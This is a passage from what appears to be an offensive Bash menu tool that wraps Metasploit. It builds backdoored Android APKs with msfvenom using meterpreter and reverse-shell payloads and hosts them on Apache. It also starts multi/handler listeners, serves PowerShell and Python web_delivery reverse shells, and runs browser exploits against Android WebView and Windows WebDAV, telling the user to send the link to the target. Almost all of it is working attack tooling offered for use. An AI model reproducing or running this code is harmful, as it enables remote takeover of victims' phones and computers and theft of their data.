Listener" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD android/meterpreter/reverse_http; exploit -j'" 3470 | else 3471 | 3472 | if [ $choice = 2 ];then 3473 | clear 3474 | fi 3475 | fi 3476 | 3477 | } 3478 | 3479 | and3 () { 3480 | clear 3481 | echo 3482 | echo "please wait.......... " 3483 | sleep 2 3484 | clear 3485 | echo ""$BLUE 3486 | echo "------------------------------------------" 3487 | echo "Your Local IP Address:[ $myip " 3488 | echo " " 3489 | echo "Your Public IP Address:[ $myip2 " 3490 | echo " " 3491 | echo "------------------------------------------" 3492 | echo "" $GREEN 3493 | echo -n "Enter LHOST=$RED" 3494 | read host 3495 | echo ""$GREEN 3496 | sleep 1 3497 | echo "LHOST==>$BLUE $host "$GREEN 3498 | echo 3499 | echo "===========================" 3500 | sleep 1 3501 | echo 3502 | echo -n "Enter LPORT=$RED" 3503 | read port 3504 | echo $GREEN 3505 | sleep 1 3506 | echo "LPORT==>$BLUE $port"$GREEN 3507 | echo 3508 | echo "===========================" 3509 | sleep 1 3510 | echo 3511 | echo -n "Enter name for payload=$RED" 3512 | read name 3513 | echo $GREEN 3514 | sleep 1 3515 | echo "NAME==>$BLUE $name "$GREEN 3516 | echo 3517 | echo "===========================" 3518 | sleep 1 3519 | echo 3520 | clear 3521 | echo 3522 | echo 3523 | echo " Payload [APK] Final Config: " 3524 | echo "===================================" 3525 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 3526 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 3527 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 3528 | echo "$BLUE PAYLOAD $GREEN:>$RED android/meterpreter/reverse_https $GREEN " 3529 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 3530 | sleep 3 3531 | cd $hh/Desktop/ 3532 | if [ -d Output ];then 3533 | echo 3534 | echo "Found Output " 3535 | sleep 1 3536 | else 3537 | mkdir Output 3538 | fi 3539 | cd .. 3540 | echo 3541 | echo 3542 | sleep 1 3543 | echo 3544 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 3545 | aa=.apk 3546 | sleep 1 3547 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p android/meterpreter/reverse_https LHOST=$host LPORT=$port -a dalvik --platform Android -f raw > $hh/Desktop/Output/$name$aa" 3548 | echo 3549 | echo $BLUE"[*]$RED:$GREEN Done! " 3550 | sleep 1 3551 | echo 3552 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3553 | cd $hh/Desktop/Output/ 3554 | chmod +x $name$aa 3555 | cp $name$aa /var/www/html 3556 | echo 3557 | echo "Done ! " 3558 | sleep 2 3559 | echo "" $GREEN 3560 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 3561 | sleep 2 3562 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 3563 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 3564 | sleep 2 3565 | echo 3566 | echo "[*]Done apache server has been started " 3567 | sleep 2 3568 | echo 3569 | echo 3570 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 3571 | echo 3572 | echo 3573 | sleep 7 3574 | clear 3575 | echo 3576 | echo 3577 | echo $BLUE" WHAT YOU WANT " 3578 | echo $BLUE"================= " 3579 | echo 3580 | echo "1 - create Listener on [$GREEN $name $BLUE]" 3581 | echo "2 - back to the menu " $GREEN 3582 | echo 3583 | echo -n "Enter choice ->> "$RED 3584 | read choice 3585 | if [ $choice = 1 ];then 3586 | clear 3587 | echo 3588 | echo 3589 | echo "starting Listener on $BLUE[ $name ]" 3590 | sleep 1 3591 | xterm -T "DHH - [$name] Listener" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD android/meterpreter/reverse_https; exploit -j'" 3592 | else 3593 | 3594 | if [ $choice = 2 ];then 3595 | clear 3596 | fi 3597 | fi 3598 | 3599 | } 3600 | 3601 | and1s () { 3602 | clear 3603 | echo 3604 | echo "please wait.......... " 3605 | sleep 2 3606 | clear 3607 | echo ""$BLUE 3608 | echo "------------------------------------------" 3609 | echo "Your Local IP Address:[ $myip " 3610 | echo " " 3611 | echo "Your Public IP Address:[ $myip2 " 3612 | echo " " 3613 | echo "------------------------------------------" 3614 | echo "" $GREEN 3615 | echo -n "Enter LHOST=$RED" 3616 | read host 3617 | echo ""$GREEN 3618 | sleep 1 3619 | echo "LHOST==>$BLUE $host "$GREEN 3620 | echo 3621 | echo "===========================" 3622 | sleep 1 3623 | echo 3624 | echo -n "Enter LPORT=$RED" 3625 | read port 3626 | echo $GREEN 3627 | sleep 1 3628 | echo "LPORT==>$BLUE $port"$GREEN 3629 | echo 3630 | echo "===========================" 3631 | sleep 1 3632 | echo 3633 | echo -n "Enter name for payload=$RED" 3634 | read name 3635 | echo $GREEN 3636 | sleep 1 3637 | echo "NAME==>$BLUE $name "$GREEN 3638 | echo 3639 | echo "===========================" 3640 | sleep 1 3641 | echo 3642 | clear 3643 | echo 3644 | echo 3645 | echo " Payload [APK] Final Config: " 3646 | echo "===================================" 3647 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 3648 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 3649 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 3650 | echo "$BLUE PAYLOAD $GREEN:>$RED android/shell/reverse_tcp $GREEN " 3651 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 3652 | sleep 3 3653 | cd $hh/Desktop/ 3654 | if [ -d Output ];then 3655 | echo 3656 | echo "Found Output " 3657 | sleep 1 3658 | else 3659 | mkdir Output 3660 | fi 3661 | cd .. 3662 | echo 3663 | echo 3664 | sleep 1 3665 | echo 3666 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 3667 | aa=.apk 3668 | sleep 1 3669 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p android/shell/reverse_tcp LHOST=$host LPORT=$port -a dalvik --platform Android -f raw > $hh/Desktop/Output/$name$aa" 3670 | echo 3671 | echo $BLUE"[*]$RED:$GREEN Done! " 3672 | sleep 1 3673 | echo 3674 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3675 | cd $hh/Desktop/Output/ 3676 | chmod +x $name$aa 3677 | cp $name$aa /var/www/html 3678 | echo 3679 | echo "Done ! " 3680 | sleep 2 3681 | echo "" $GREEN 3682 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 3683 | sleep 2 3684 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 3685 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 3686 | sleep 2 3687 | echo 3688 | echo "[*]Done apache server has been started " 3689 | sleep 2 3690 | echo 3691 | echo 3692 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 3693 | echo 3694 | echo 3695 | sleep 7 3696 | clear 3697 | echo 3698 | echo 3699 | echo $BLUE" WHAT YOU WANT " 3700 | echo $BLUE"================= " 3701 | echo 3702 | echo "1 - create Listener on [$GREEN $name $BLUE]" 3703 | echo "2 - back to the menu " $GREEN 3704 | echo 3705 | echo -n "Enter choice ->> "$RED 3706 | read choice 3707 | if [ $choice = 1 ];then 3708 | clear 3709 | echo 3710 | echo 3711 | echo "starting Listener on $BLUE[ $name ]" 3712 | sleep 1 3713 | xterm -T "DHH - [$name] Listener" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD android/shell/reverse_tcp; exploit -j'" 3714 | else 3715 | 3716 | if [ $choice = 2 ];then 3717 | clear 3718 | fi 3719 | fi 3720 | 3721 | } 3722 | 3723 | and2s () { 3724 | clear 3725 | echo 3726 | echo "please wait.......... " 3727 | sleep 2 3728 | clear 3729 | echo ""$BLUE 3730 | echo "------------------------------------------" 3731 | echo "Your Local IP Address:[ $myip " 3732 | echo " " 3733 | echo "Your Public IP Address:[ $myip2 " 3734 | echo " " 3735 | echo "------------------------------------------" 3736 | echo "" $GREEN 3737 | echo -n "Enter LHOST=$RED" 3738 | read host 3739 | if [ -z $LHOST ];then 3740 | echo 3741 | echo 3742 | echo "$RED[x]$BLUE The error your not Enter anything !! " 3743 | sleep 3 3744 | and2s 3745 | fi 3746 | echo ""$GREEN 3747 | sleep 1 3748 | echo "LHOST==>$BLUE $host "$GREEN 3749 | echo 3750 | echo "===========================" 3751 | sleep 1 3752 | echo 3753 | echo -n "Enter LPORT=$RED" 3754 | read port 3755 | if [ -z $port ];then 3756 | echo 3757 | echo 3758 | echo "$RED[x]$BLUE The error your not Enter anything !! " 3759 | sleep 3 3760 | and2s 3761 | fi 3762 | echo $GREEN 3763 | sleep 1 3764 | echo "LPORT==>$BLUE $port"$GREEN 3765 | echo 3766 | echo "===========================" 3767 | sleep 1 3768 | echo 3769 | echo -n "Enter name for payload=$RED" 3770 | read name 3771 | if [ -z $name ];then 3772 | echo 3773 | echo 3774 | echo "$RED[x]$BLUE The error your not Enter anything !! " 3775 | sleep 3 3776 | and2s 3777 | fi 3778 | echo $GREEN 3779 | sleep 1 3780 | echo "NAME==>$BLUE $name "$GREEN 3781 | echo 3782 | echo "===========================" 3783 | sleep 1 3784 | echo 3785 | clear 3786 | echo 3787 | echo 3788 | echo " Payload [APK] Final Config: " 3789 | echo "===================================" 3790 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 3791 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 3792 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 3793 | echo "$BLUE PAYLOAD $GREEN:>$RED android/shell/reverse_http $GREEN " 3794 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 3795 | sleep 3 3796 | cd $hh/Desktop/ 3797 | if [ -d Output ];then 3798 | echo 3799 | echo "Found Output " 3800 | sleep 1 3801 | else 3802 | mkdir Output 3803 | fi 3804 | cd .. 3805 | echo 3806 | echo 3807 | sleep 1 3808 | echo 3809 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 3810 | aa=.apk 3811 | sleep 1 3812 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p android/shell/reverse_http LHOST=$host LPORT=$port -a dalvik --platform Android -f raw > $hh/Desktop/Output/$name$aa" 3813 | echo 3814 | echo $BLUE"[*]$RED:$GREEN Done! " 3815 | sleep 1 3816 | echo 3817 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3818 | cd $hh/Desktop/Output/ 3819 | chmod +x $name$aa 3820 | cp $name$aa /var/www/html 3821 | echo 3822 | echo "Done ! " 3823 | sleep 2 3824 | echo "" $GREEN 3825 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 3826 | sleep 2 3827 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 3828 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 3829 | sleep 2 3830 | echo 3831 | echo "[*]Done apache server has been started " 3832 | sleep 2 3833 | echo 3834 | echo 3835 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 3836 | echo 3837 | echo 3838 | sleep 7 3839 | clear 3840 | echo 3841 | echo 3842 | echo $BLUE" WHAT YOU WANT " 3843 | echo $BLUE"================= " 3844 | echo 3845 | echo "1 - create Listener on [$GREEN $name $BLUE]" 3846 | echo "2 - back to the menu " $GREEN 3847 | echo 3848 | echo -n "Enter choice ->> "$RED 3849 | read choice 3850 | if [ $choice = 1 ];then 3851 | clear 3852 | echo 3853 | echo 3854 | echo "starting Listener on $BLUE[ $name ]" 3855 | sleep 1 3856 | xterm -T "DHH - [$name] Listener" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD android/shell/reverse_http; exploit -j'" 3857 | else 3858 | 3859 | if [ $choice = 2 ];then 3860 | clear 3861 | fi 3862 | fi 3863 | 3864 | } 3865 | 3866 | and3s () { 3867 | clear 3868 | echo 3869 | echo "please wait.......... " 3870 | sleep 2 3871 | clear 3872 | echo ""$BLUE 3873 | echo "------------------------------------------" 3874 | echo "Your Local IP Address:[ $myip " 3875 | echo " " 3876 | echo "Your Public IP Address:[ $myip2 " 3877 | echo " " 3878 | echo "------------------------------------------" 3879 | echo "" $GREEN 3880 | echo -n "Enter LHOST=$RED" 3881 | read host 3882 | if [ -z $host ];then 3883 | echo 3884 | echo 3885 | echo "$RED[x]$BLUE The error your not Enter anything !! " 3886 | sleep 3 3887 | and3s 3888 | fi 3889 | echo ""$GREEN 3890 | sleep 1 3891 | echo "LHOST==>$BLUE $host "$GREEN 3892 | echo 3893 | echo "===========================" 3894 | sleep 1 3895 | echo 3896 | echo -n "Enter LPORT=$RED" 3897 | read port 3898 | if [ -z $port ];then 3899 | echo 3900 | echo 3901 | echo "$RED[x]$BLUE The error your not Enter anything !! " 3902 | sleep 3 3903 | and3s 3904 | fi 3905 | echo $GREEN 3906 | sleep 1 3907 | echo "LPORT==>$BLUE $port"$GREEN 3908 | echo 3909 | echo "===========================" 3910 | sleep 1 3911 | echo 3912 | echo -n "Enter name for payload=$RED" 3913 | read name 3914 | if [ -z $name ];then 3915 | echo 3916 | echo 3917 | echo "$RED[x]$BLUE The error your not Enter anything !! " 3918 | sleep 3 3919 | and3s 3920 | fi 3921 | echo $GREEN 3922 | sleep 1 3923 | echo "NAME==>$BLUE $name "$GREEN 3924 | echo 3925 | echo "===========================" 3926 | sleep 1 3927 | echo 3928 | clear 3929 | echo 3930 | echo 3931 | echo " Payload [APK] Final Config: " 3932 | echo "===================================" 3933 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 3934 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 3935 | echo "$BLUE NAME $GREEN:>$RED $name $GREEN" 3936 | echo "$BLUE PAYLOAD $GREEN:>$RED android/shell/reverse_https $GREEN " 3937 | echo "$BLUE SAVE IN $GREEN:>$RED /root/Desktop/Output/$name and /var/www/$name $GREEN" 3938 | sleep 3 3939 | cd $hh/Desktop/ 3940 | if [ -d Output ];then 3941 | echo 3942 | echo "Found Output " 3943 | sleep 1 3944 | else 3945 | mkdir Output 3946 | fi 3947 | cd .. 3948 | echo 3949 | echo 3950 | sleep 1 3951 | echo 3952 | echo $BLUE"[*]$RED:$GREEN Create $RED [$BLUE $name $RED] " 3953 | aa=.apk 3954 | sleep 1 3955 | xterm -T "DHH - Create [$name]" -geometry 110x23 -e "msfvenom -p android/shell/reverse_https LHOST=$host LPORT=$port -a dalvik --platform Android -f raw > $hh/Desktop/Output/$name$aa" 3956 | echo 3957 | echo $BLUE"[*]$RED:$GREEN Done! " 3958 | sleep 1 3959 | echo 3960 | echo "$BLUE[*]$GREEN cp$RED:$BLUE[$RED $name $GREEN to $RED /var/www/html/$name$BLUE ]" 3961 | cd $hh/Desktop/Output/ 3962 | chmod +x $name$aa 3963 | cp $name$aa /var/www/html 3964 | echo 3965 | echo "Done ! " 3966 | sleep 2 3967 | echo "" $GREEN 3968 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 3969 | sleep 2 3970 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 3971 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 3972 | sleep 2 3973 | echo 3974 | echo "[*]Done apache server has been started " 3975 | sleep 2 3976 | echo 3977 | echo 3978 | echo "$RED Done Payload has been Created in$GREEN ->>>$BLUE[ /root/Desktop/Output/$name and /var/www/html/$name ]" 3979 | echo 3980 | echo 3981 | sleep 7 3982 | clear 3983 | echo 3984 | echo 3985 | echo $BLUE" WHAT YOU WANT " 3986 | echo $BLUE"================= " 3987 | echo 3988 | echo "1 - create Listener on [$GREEN $name $BLUE]" 3989 | echo "2 - back to the menu " $GREEN 3990 | echo 3991 | echo -n "Enter choice ->> "$RED 3992 | read choice 3993 | if [ $choice = 1 ];then 3994 | clear 3995 | echo 3996 | echo 3997 | echo "starting Listener on $BLUE[ $name ]" 3998 | sleep 1 3999 | xterm -T "DHH - [$name] Listener" -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $host; set LPORT $port; set PAYLOAD android/shell/reverse_https; exploit -j'" 4000 | else 4001 | 4002 | if [ $choice = 2 ];then 4003 | clear 4004 | fi 4005 | fi 4006 | 4007 | } 4008 | 4009 | 4010 | 4011 | function android { 4012 | clear 4013 | 4014 | cat << ! 4015 | 4016 | $RED 4017 | .___ .__ .___ ___. __ .___ 4018 | _____ ____ __| _/______ ____ |__| __| _/ \_ |__ _____ ____ | | __ __| _/____ ___________ 4019 | \__ \ / \ / __ |\_ __ \/ _ \| |/ __ | | __ \\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \ 4020 | / __ \| | \/ /_/ | | | \( <_> ) / /_/ | | \_\ \/ __ \\ \___| | <_> ) | \/ 4021 | (____ /___| /\____ | |__| \____/|__\____ | |___ (____ /\___ >__|_ \____ |\____/ \____/|__| 4022 | \/ \/ \/ \/ \/ \/ \/ \/ \/ $BLUE 4023 | 4024 | 4025 | PAYLODS 4026 | ======= 4027 | 4028 | METERPRETER 4029 | ============$GREEN 4030 | 1 $BLUE > android/meterpreter/reverse_tcp $GREEN 4031 | 2 $BLUE > android/meterpreter/reverse_http $GREEN 4032 | 3 $BLUE > android/meterpreter/reverse_https $BLUE 4033 | 4034 | SHELL 4035 | ======$GREEN 4036 | 4 $BLUE > android/shell/reverse_tcp $GREEN 4037 | 5 $BLUE > android/shell/reverse_http $GREEN 4038 | 6 $BLUE > android/shell/reverse_https $GREEN 4039 | 4040 | 4041 | 7 $BLUE >$RED EXIT $GREEN 4042 | 4043 | ! 4044 | echo "============================================================="$BLUE 4045 | echo 4046 | echo -n "choice payload :> $RED " 4047 | read pylo 4048 | case $pylo in 4049 | 1)and1 ;; 4050 | 2)and2 ;; 4051 | 3)and3 ;; 4052 | 4)and1s ;; 4053 | 5)and2s ;; 4054 | 6)and3s ;; 4055 | 7)exie ;; 4056 | *) echo "\"$pylo\":$RED[x]$BLUE The error of your choice does not exist"; sleep 2 ;; 4057 | esac 4058 | android 4059 | } 4060 | 4061 | power () { 4062 | clear 4063 | echo 4064 | echo 4065 | echo "please wait.......... " 4066 | sleep 2 4067 | clear 4068 | echo ""$BLUE 4069 | echo "------------------------------------------" 4070 | echo "Your Local IP Address:[ $myip " 4071 | echo " " 4072 | echo "Your Public IP Address:[ $myip2 " 4073 | echo " " 4074 | echo "------------------------------------------" 4075 | echo "" $GREEN 4076 | echo -n "Enter LHOST=$RED" 4077 | read host 4078 | if [ -z $host ];then 4079 | echo 4080 | echo 4081 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4082 | sleep 3 4083 | power 4084 | fi 4085 | echo ""$GREEN 4086 | sleep 1 4087 | echo "LHOST==>$BLUE $host "$GREEN 4088 | echo 4089 | echo "===========================" 4090 | sleep 1 4091 | echo 4092 | echo -n "Enter LPORT=$RED" 4093 | read port 4094 | if [ -z $port ];then 4095 | echo 4096 | echo 4097 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4098 | sleep 3 4099 | power 4100 | fi 4101 | echo $GREEN 4102 | sleep 1 4103 | echo "LPORT==>$BLUE $port"$GREEN 4104 | echo 4105 | echo "===========================" 4106 | sleep 1 4107 | echo 4108 | clear 4109 | echo 4110 | echo 4111 | echo " Payload [web_delivery - [powershell] Final Config:" 4112 | echo "===================================================" 4113 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 4114 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 4115 | echo "$BLUE exploit $GREEN:>$RED multi/script/web_delivery [powershell] $GREEN " 4116 | sleep 3 4117 | echo 4118 | echo 4119 | echo $BLUE"[*]$RED:$GREEN create and Listener $RED [$BLUE web_delvery$RED [$BLUE powershell $RED] " 4120 | sleep 2 4121 | echo 4122 | echo 4123 | xterm -T " DHH - Listener [web_delivery powershell payload] " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/script/web_delivery; set SRVHOST $host; set TARGET 2; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST $host; set LPORT $port; set URIPATH /a; exploit -j'" 4124 | 4125 | echo "Done ! " 4126 | 4127 | } 4128 | 4129 | py () { 4130 | clear 4131 | echo 4132 | echo 4133 | echo "please wait.......... " 4134 | sleep 2 4135 | clear 4136 | echo ""$BLUE 4137 | echo "------------------------------------------" 4138 | echo "Your Local IP Address:[ $myip " 4139 | echo " " 4140 | echo "Your Public IP Address:[ $myip2 " 4141 | echo " " 4142 | echo "------------------------------------------" 4143 | echo "" $GREEN 4144 | echo -n "Enter LHOST=$RED" 4145 | read host 4146 | if [ -z $host ];then 4147 | echo 4148 | echo 4149 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4150 | sleep 3 4151 | py 4152 | fi 4153 | echo ""$GREEN 4154 | sleep 1 4155 | echo "LHOST==>$BLUE $host "$GREEN 4156 | echo 4157 | echo "===========================" 4158 | sleep 1 4159 | echo 4160 | echo -n "Enter LPORT=$RED" 4161 | read port 4162 | if [ -z $port ];then 4163 | echo 4164 | echo 4165 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4166 | sleep 3 4167 | py 4168 | fi 4169 | echo $GREEN 4170 | sleep 1 4171 | echo "LPORT==>$BLUE $port"$GREEN 4172 | echo 4173 | echo "===========================" 4174 | sleep 1 4175 | echo 4176 | clear 4177 | echo 4178 | echo 4179 | echo " Payload [web_delivery - [python] Final Config:" 4180 | echo "===================================================" 4181 | echo "$BLUE LHOST $GREEN:>$RED $host $GREEN" 4182 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 4183 | echo "$BLUE exploit $GREEN:>$RED multi/script/web_delivery [python] $GREEN " 4184 | sleep 3 4185 | echo 4186 | echo 4187 | echo $BLUE"[*]$RED:$GREEN create and Listener $RED [$BLUE web_delvery$RED [$BLUE python $RED] " 4188 | sleep 2 4189 | echo 4190 | echo 4191 | xterm -T " DHH - Listener [web_delivery python payload] " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/script/web_delivery; set SRVHOST $host; set TARGET 0; set PAYLOAD python/meterpreter/reverse_tcp; set LHOST $host; set LPORT $port; set URIPATH /a; exploit -j'" 4192 | 4193 | echo "Done ! " 4194 | 4195 | } 4196 | 4197 | 4198 | 4199 | 4200 | 4201 | 4202 | 4203 | function webdd { 4204 | clear 4205 | 4206 | cat << ! 4207 | 4208 | $RED 4209 | 4210 | _______ ______ ______ _______ _ _________ _______ _______ 4211 | |\ /|( ____ \( ___ \ ( __ \ ( ____ \( \ \__ __/|\ /|( ____ \( ____ )|\ /| 4212 | | ) ( || ( \/| ( ) ) | ( \ )| ( \/| ( ) ( | ) ( || ( \/| ( )|( \ / ) 4213 | | | _ | || (__ | (__/ / | | ) || (__ | | | | | | | || (__ | (____)| \ (_) / 4214 | | |( )| || __) | __ ( | | | || __) | | | | ( ( ) )| __) | __) \ / 4215 | | || || || ( | ( \ \ | | ) || ( | | | | \ \_/ / | ( | (\ ( ) ( 4216 | | () () || (____/\| )___) ) | (__/ )| (____/\| (____/\___) (___ \ / | (____/\| ) \ \__ | | 4217 | (_______)(_______/|/ \___/_____(______/ (_______/(_______/\_______/ \_/ (_______/|/ \__/ \_/ $GREEN 4218 | (_____) 4219 | 4220 | 4221 | 1 $BLUE > powershell for [ exploit windows ] $GREEN 4222 | 2 $BLUE > python for [ exploit linux ]$GREEN 4223 | 4224 | 3 $BLUE >$RED Exit $GREEN 4225 | 4226 | ======================================================= 4227 | ! 4228 | echo -n "Enter choice{1/2/3 >> : $RED " 4229 | read cho 4230 | case $cho in 4231 | 1)power ;; 4232 | 2)py ;; 4233 | 3)exie ;; 4234 | *) echo "\"$cho\":$RED[x]$BLUE The error of your choice does not exist"; sleep 2 ;; 4235 | esac 4236 | webdd 4237 | 4238 | } 4239 | 4240 | andro1 () { 4241 | clear 4242 | echo 4243 | echo 4244 | echo "please wait.........." 4245 | sleep 2 4246 | clear 4247 | echo $BLUE 4248 | echo "------------------------------------------" 4249 | echo "Your Local IP Address:[ $myip " 4250 | echo " " 4251 | echo "Your Public IP Address:[ $myip2 " 4252 | echo " " 4253 | echo "------------------------------------------" 4254 | echo "" $GREEN 4255 | echo 4256 | echo -n "Enter SRVHOST=$RED" 4257 | read LHOST 4258 | if [ -z $LHOST ];then 4259 | echo 4260 | echo 4261 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4262 | sleep 3 4263 | andro1 4264 | fi 4265 | echo "" $GREEN 4266 | sleep 1 4267 | echo "SRVHOST==>$BLUE $LHOST "$GREEN 4268 | echo 4269 | echo "===========================" 4270 | echo 4271 | echo -n "Enter LPORT=$RED" 4272 | read port 4273 | if [ -z $port ];then 4274 | echo 4275 | echo 4276 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4277 | sleep 3 4278 | andro1 4279 | fi 4280 | echo "" $GREEN 4281 | sleep 1 4282 | echo "LPORT==>$BLUE $port "$GREEN 4283 | echo 4284 | echo "===========================" 4285 | sleep 1 4286 | clear 4287 | echo 4288 | echo 4289 | echo " Final Config: " 4290 | echo "====================================" 4291 | echo "$BLUE SRVHOST $GREEN:>$RED $LHOST $GREEN" 4292 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 4293 | echo "$BLUE exploit $GREEN:>$RED android/browser/webview_addjavascriptinterface $GREEN " 4294 | echo 4295 | sleep 4 4296 | echo $BLUE"[*]$RED:$GREEN create $RED [$BLUE exploit android $RED] " 4297 | sleep 2 4298 | echo 4299 | echo "$GREEN Done !" 4300 | echo "" $GREEN 4301 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 4302 | sleep 2 4303 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 4304 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 4305 | sleep 2 4306 | echo 4307 | echo "[*]Done apache server has been started " 4308 | sleep 2 4309 | echo 4310 | echo "$BLUE[*]$RED:$GREEN[Send This Link To The Target Android[ http://$LHOST:8080/a ] ]" 4311 | echo 4312 | sleep 1 4313 | echo "starting Listener on $BLUE[ http://$LHOST:8080/a ]" 4314 | sleep 1 4315 | xterm -T "DHH - Listenner" -geometry 99x23 -e "msfconsole -x 'use exploit/android/browser/webview_addjavascriptinterface; set PAYLOAD android/meterpreter/reverse_tcp; set SRVHOST $LHOST; set LPORT $port; set LHOST $LHOST; set URIPATH /a; exploit -j'" 4316 | 4317 | echo "Done !" 4318 | sleep 1 4319 | 4320 | } 4321 | 4322 | win1 () { 4323 | clear 4324 | echo 4325 | echo 4326 | echo "please wait.........." 4327 | sleep 2 4328 | clear 4329 | echo $BLUE 4330 | echo "------------------------------------------" 4331 | echo "Your Local IP Address:[ $myip " 4332 | echo " " 4333 | echo "Your Public IP Address:[ $myip2 " 4334 | echo " " 4335 | echo "------------------------------------------" 4336 | echo "" $GREEN 4337 | echo 4338 | echo -n "Enter SRVHOST=$RED" 4339 | read LHOST 4340 | if [ -z $LHOST ];then 4341 | echo 4342 | echo 4343 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4344 | sleep 3 4345 | win1 4346 | fi 4347 | echo "" $GREEN 4348 | sleep 1 4349 | echo "SRVHOST==>$BLUE $LHOST "$GREEN 4350 | echo 4351 | echo "===========================" 4352 | echo 4353 | echo -n "Enter LPORT=$RED" 4354 | read port 4355 | if [ -z $port ];then 4356 | echo 4357 | echo 4358 | echo "$RED[x]$BLUE The error your not Enter anything !! " 4359 | sleep 3 4360 | win1 4361 | fi 4362 | echo "" $GREEN 4363 | sleep 1 4364 | echo "LPORT==>$BLUE $port "$GREEN 4365 | echo 4366 | echo "===========================" 4367 | sleep 1 4368 | clear 4369 | echo 4370 | echo 4371 | echo " Final Config: " 4372 | echo "=========================================" 4373 | echo "$BLUE SRVHOST $GREEN:>$RED $LHOST $GREEN" 4374 | echo "$BLUE LPORT $GREEN:>$RED $port $GREEN" 4375 | echo "$BLUE exploit $GREEN:>$RED windows/browser/webdav_dll_hijacker $GREEN" 4376 | sleep 3 4377 | echo 4378 | echo 4379 | echo $BLUE"[*]$RED:$GREEN create $RED [$BLUE exploit windows $RED] " 4380 | sleep 2 4381 | echo 4382 | echo "$GREEN Done !" 4383 | sleep 1 4384 | echo 4385 | echo "[*]$RED:$BLUE STARTING APACHE SERVER$RED.........." 4386 | sleep 2 4387 | xterm -T "DHH - start Apache webserver" -geometry 110x23 -e "service apache2 start" 4388 | echo $BLUE[*]$RED:$RED[start apache2]$RED:$GREEN[ OK ] 4389 | sleep 2 4390 | echo 4391 | echo "[*]Done apache server has been started " 4392 | sleep 2 4393 | echo 4394 | echo "$BLUE[*]$RED:$GREEN[Send This Link To The Target Windows[ http://$LHOST:8080/a ] ]" 4395 | echo 4396 | sleep 1 4397 | echo "starting Listener on $BLUE[ http://$LHOST:8080/a ]" 4398 | 4399 | xterm -T "DHH - Listener " -geometry 110x23 -e "msfconsole -x 'use exploit/windows/browser/webdav_dll_hijacker; set PYLOAD 